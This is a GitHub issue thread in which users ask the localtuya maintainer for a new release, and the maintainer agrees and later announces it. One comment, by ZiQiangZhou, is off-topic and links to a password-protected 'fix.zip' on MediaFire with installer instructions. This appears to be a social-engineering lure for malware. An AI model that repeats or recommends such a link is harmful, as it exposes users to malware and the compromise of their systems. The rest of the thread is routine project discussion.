### ISSUE TITLE
It is time to make a release

### ISSUE THREAD

**Issue by glebsterx** [rospogrigio/localtuya#1771]
More than a year has passed since the last release. During this time, changes were made to the code. Most of them are for compatibility with new versions of Home Assistant, but there are still changes. 

For a long time, the HACS interface had the ability to install the master version of the component, but with the latest update this option was taken away from us.
I ask the author @rospogrigio - please release it. 
In its current form, the master branch is quite stable, as far as I can tell.

Thank you!

P.S. I'm not asking you to spend time fixing bugs or developing new functionality, just make a minor release from what you already have.

P.P.S. I know at least 2 ways to install/update a component (through the service and manually). But why do all this if there is a standard one. In addition, these methods may seem complicated to some, because not all of us are well versed in IT.

**Comment by ZiQiangZhou** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by rospogrigio** [comment]
Ok sounds reasonable, I'll do it tomorrow...

**Comment by darth-aragoth** [comment]
I hope that the new version will bring some functionality related to Zigbee/Bluetooth gateways and their sub-devices :)

**Comment by rospogrigio** [comment]
> I hope that the new version will bring some functionality related to Zigbee/Bluetooth gateways and their sub-devices :)

Sorry no, I've been working a lot on the ZB functionalities but there are issues I am still trying to fix. Need to wait a bit longer....

**Comment by rospogrigio** [comment]
Done, enjoy 😉
